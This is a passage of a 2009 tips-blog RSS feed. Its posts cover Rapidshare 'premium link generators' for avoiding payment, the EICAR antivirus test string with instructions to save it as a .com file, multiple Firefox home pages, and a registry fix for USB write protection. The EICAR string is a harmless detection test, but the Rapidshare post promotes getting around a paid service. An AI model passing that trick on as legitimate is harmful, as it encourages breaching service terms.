<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tipsntricks4u.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tipsntricks4u.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tipsntricks4u.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tipsntricks4u.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tipsntricks4u.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tipsntricks4u.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tipsntricks4u.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tipsntricks4u.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tipsntricks4u.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tipsntricks4u.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tipsntricks4u.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tipsntricks4u.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tipsntricks4u.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tipsntricks4u.wordpress.com/93/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=93&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tipsntricks4u.wordpress.com/2009/11/16/disable-autoupdate-of-unregistered-windows/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e6b78bd22ecd5602c9543578f0227a9e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tipsntricks4u</media:title>
		</media:content>

		<media:content url="http://3.bp.blogspot.com/_myPl2ceQSRc/Sv_PRXXUbFI/AAAAAAAAAA8/8bLXPNXKYlc/s400/msconfign.jpg" medium="image" />
	</item>
		<item>
		<title>Download Rapidshare File Without Premium Account !</title>
		<link>http://tipsntricks4u.wordpress.com/2009/11/16/download-rapidshare-file-without-premium-account/</link>
		<comments>http://tipsntricks4u.wordpress.com/2009/11/16/download-rapidshare-file-without-premium-account/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 04:34:56 +0000</pubDate>
		<dc:creator>tipsntricks4u</dc:creator>
				<category><![CDATA[Internet]]></category>

		<guid isPermaLink="false">http://tipsntricks4u.wordpress.com/?p=89</guid>
		<description><![CDATA[I saw many of you guys ask for Rapidshare ect.. Premium account(i seen many ) but you dont need others account or no account at all.. why you used other&#8217;s hacked id and password (somebody have to pay 4 you ne ) But I always use Link Generators&#8230;some people didnt know abt this&#8230; i&#8217;m helping [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=89&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><!-- message --> I saw many of you guys ask for Rapidshare ect.. Premium account(i seen many )  but you dont need others account or no account at all..</p>
<p>why you used other&#8217;s hacked id and password (somebody have to pay 4 you ne )</p>
<p>But I always use Link Generators&#8230;some people didnt know abt this&#8230; i&#8217;m helping these people</p>
<p>so first of all&#8230;&#8230;&#8230;.. Back ground</p>
<p>&#8212;&#8211;///&#8212;-What does Premium Link Generators do</p>
<p>When you applied a Download link (supported host)<br />
they take the link, &amp; from their server they automatically use their Premium account and give us their Premium download link. which can be pause and maximum speed(All the premium members download facilities)</p>
<p>you can&#8217;t use this for your uploads&#8230;</p>
<p>Now you know what happens ne now for the downloading steps</p>
<p>1. Find a Premium Link generating server (this will be easy) but for example i will give you which I&#8217;m using. Then go to their WEB&#8230;&#8230;.</p>
<p>I&#8217;m Using This&#8212;  <a href="http://rapid8.com/" target="_blank">http://rapid8.com</a> (I recommend )</p>
<p><img src="http://img27.imageshack.us/img27/9094/step1xf.jpg" border="0" alt="" /></p>
<p>2. Put your Download link&#8230;&#8230;..</p>
<p><img src="http://img198.imageshack.us/img198/8612/step2v.jpg" border="0" alt="" /></p>
<p>3. Let it generate a link this will take 10s &#8230;&#8230;</p>
<p><img src="http://img196.imageshack.us/img196/3853/step3ym.jpg" border="0" alt="" /></p>
<p>4. Get the link and start downloading&#8230;&#8230; <img title="Laugh" src="http://www.elakiri.com/forum/images/smilies/sq/laugh8kb.gif" border="0" alt="" /></p>
<p><img src="http://img225.imageshack.us/img225/8312/step4.jpg" border="0" alt="" /></p>
<p>If you having problem Reply or PM</p>
<p>Now you guys no need ask others for their Premium Accounts</p>
<p><span style="font-size:x-small;">I hope This will help&#8230;.</span>.Enjoy</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tipsntricks4u.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tipsntricks4u.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tipsntricks4u.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tipsntricks4u.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tipsntricks4u.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tipsntricks4u.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tipsntricks4u.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tipsntricks4u.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tipsntricks4u.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tipsntricks4u.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tipsntricks4u.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tipsntricks4u.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tipsntricks4u.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tipsntricks4u.wordpress.com/89/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=89&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tipsntricks4u.wordpress.com/2009/11/16/download-rapidshare-file-without-premium-account/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e6b78bd22ecd5602c9543578f0227a9e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tipsntricks4u</media:title>
		</media:content>

		<media:content url="http://img27.imageshack.us/img27/9094/step1xf.jpg" medium="image" />

		<media:content url="http://img198.imageshack.us/img198/8612/step2v.jpg" medium="image" />

		<media:content url="http://img196.imageshack.us/img196/3853/step3ym.jpg" medium="image" />

		<media:content url="http://www.elakiri.com/forum/images/smilies/sq/laugh8kb.gif" medium="image">
			<media:title type="html">Laugh</media:title>
		</media:content>

		<media:content url="http://img225.imageshack.us/img225/8312/step4.jpg" medium="image" />
	</item>
		<item>
		<title>Test Your Anti-Virus Status</title>
		<link>http://tipsntricks4u.wordpress.com/2009/11/16/test-your-anti-virus-status/</link>
		<comments>http://tipsntricks4u.wordpress.com/2009/11/16/test-your-anti-virus-status/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 04:11:18 +0000</pubDate>
		<dc:creator>tipsntricks4u</dc:creator>
				<category><![CDATA[Anti-virus]]></category>

		<guid isPermaLink="false">http://tipsntricks4u.wordpress.com/?p=87</guid>
		<description><![CDATA[Copy and paste the code below into notebook X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* (The text should be in one line.) Save file as &#8220;checkantivirus.com&#8221; including quotation-marks (make sure it is saved in extention . com) A few seconds after saving this file, your Anti-Virus should come with the message that this file is infected with virus asking permission for [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=87&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><!-- message --> Copy and paste the code below into notebook</p>
<p><span style="color:lime;"><span style="color:yellowgreen;"><br />
<span style="color:red;">X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*</span></span><br />
</span></p>
<p>(The text should be in one line.)</p>
<p>Save file as &#8220;checkantivirus.com&#8221; including quotation-marks (make sure it is saved in extention . com)</p>
<p>A few seconds after saving this file, your Anti-Virus should come with the message that this file is infected with virus asking permission for its deletion/clean.</p>
<p>*** This file is secure and its not going to infect your computer in whatever way. It is a standard text developed by the European Institute for Computer Anti-virus Research (EICAR). Every Anti-Virus is programed to load this file as a virus.***</p>
<p>If your Anti-Virus will not detect this file as a virus, a program will appear as DOS window with this text EICAR-STANDARD-ANTIVIRUS-TEST-FILE.<br />
If this happens then you should probably find some other Anti-Virus up to date as you are not fully protected</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tipsntricks4u.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tipsntricks4u.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tipsntricks4u.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tipsntricks4u.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tipsntricks4u.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tipsntricks4u.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tipsntricks4u.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tipsntricks4u.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tipsntricks4u.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tipsntricks4u.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tipsntricks4u.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tipsntricks4u.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tipsntricks4u.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tipsntricks4u.wordpress.com/87/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=87&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tipsntricks4u.wordpress.com/2009/11/16/test-your-anti-virus-status/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e6b78bd22ecd5602c9543578f0227a9e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tipsntricks4u</media:title>
		</media:content>
	</item>
		<item>
		<title>Set Multiple Home Pages In Firefox</title>
		<link>http://tipsntricks4u.wordpress.com/2009/11/16/set-multiple-home-pages-in-firefox/</link>
		<comments>http://tipsntricks4u.wordpress.com/2009/11/16/set-multiple-home-pages-in-firefox/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 03:55:32 +0000</pubDate>
		<dc:creator>tipsntricks4u</dc:creator>
				<category><![CDATA[Internet]]></category>

		<guid isPermaLink="false">http://tipsntricks4u.wordpress.com/?p=85</guid>
		<description><![CDATA[Did you people ever wish to set-up multiple home pages in Firefox ? I yes, then you are at the right place. So here’s the way to do this little but useful little trick. Suppose you would like to set Orkut, Google and my blog as your homepages. Then try this tweak in Firefox to [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=85&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Did you people ever wish to set-up multiple home pages in Firefox ?<br />
I yes, then you are at the right place. So here’s the way to do this little but useful little trick.<br />
Suppose you would like to set Orkut, Google and my blog as your homepages. Then try this tweak in Firefox to set multiple homepages. This is what you should do :<br />
Goto Tools&gt;Options&gt;Main<br />
In the When Firefox starts drop down menu choose Show my home page<br />
In Home page give your homepages separated by a | (pipe symbol)<br />
Example:-  http://www.google.com|http://www.tipsntricks303.blogspot.com</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tipsntricks4u.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tipsntricks4u.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tipsntricks4u.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tipsntricks4u.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tipsntricks4u.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tipsntricks4u.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tipsntricks4u.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tipsntricks4u.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tipsntricks4u.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tipsntricks4u.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tipsntricks4u.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tipsntricks4u.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tipsntricks4u.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tipsntricks4u.wordpress.com/85/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=85&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tipsntricks4u.wordpress.com/2009/11/16/set-multiple-home-pages-in-firefox/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e6b78bd22ecd5602c9543578f0227a9e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tipsntricks4u</media:title>
		</media:content>
	</item>
		<item>
		<title>Remove Write Protection From Usb, Flash Drives And Memory Card</title>
		<link>http://tipsntricks4u.wordpress.com/2009/11/16/remove-write-protection-from-usb-flash-drives-and-memory-card/</link>
		<comments>http://tipsntricks4u.wordpress.com/2009/11/16/remove-write-protection-from-usb-flash-drives-and-memory-card/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 03:31:59 +0000</pubDate>
		<dc:creator>tipsntricks4u</dc:creator>
				<category><![CDATA[Tips]]></category>

		<guid isPermaLink="false">http://tipsntricks4u.wordpress.com/?p=82</guid>
		<description><![CDATA[Sometimes you are unable to copy files into USB drive such as flash drives, memory card and Ipod. When your USB flash drive, or memory card is write-protected, you will receive the following error message: Cannot copy files and folders, drive is write protected Cannot format the drive, drive is write protected The disk is write [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=82&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Sometimes you are unable to copy files into USB drive such as flash drives, memory card and Ipod. When your USB flash drive, or memory card is write-protected, you will receive the following error message:</p>
<p>Cannot copy files and folders, drive is write protected<br />
Cannot format the drive, drive is write protected<br />
The disk is write protected<br />
Remove write protection or use another disk<br />
Media is write protected<br />
This may caused by virus or malware script which modifiies the registry to make any drive write protect when connected to the computer, You can remove write protection from your usb flash drive or memory card using the below method:</p>
<p>1. Open Start Menu &gt;&gt; Run, type regedit and press Enter, this will open<br />
the registry editor.<br />
2. Navigate to the following path:<br />
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\StorageDevicePolicies</p>
<p>Note: If the registry key StorageDevicePolicies does not exist, you will need to create it manually.</p>
<p>3. Double click the key WriteProtect in the right window and set the value to 0 in the Value Data Box<br />
and press OK button</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tipsntricks4u.wordpress.com/82/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tipsntricks4u.wordpress.com/82/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tipsntricks4u.wordpress.com/82/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tipsntricks4u.wordpress.com/82/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tipsntricks4u.wordpress.com/82/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tipsntricks4u.wordpress.com/82/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tipsntricks4u.wordpress.com/82/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tipsntricks4u.wordpress.com/82/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tipsntricks4u.wordpress.com/82/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tipsntricks4u.wordpress.com/82/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tipsntricks4u.wordpress.com/82/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tipsntricks4u.wordpress.com/82/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tipsntricks4u.wordpress.com/82/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tipsntricks4u.wordpress.com/82/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tipsntricks4u.wordpress.com&amp;blog=10505014&amp;post=82&amp;subd=tipsntricks4u&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tipsntricks4u.wordpress.com/2009/11/16/remove-write-protection-from-usb-flash-drives-and-memory-card/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e6b78bd22ecd5602c9543578f0227a9e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tipsntricks4u</media:title>
		</media:content>
	</item>
	</channel>
</rss>
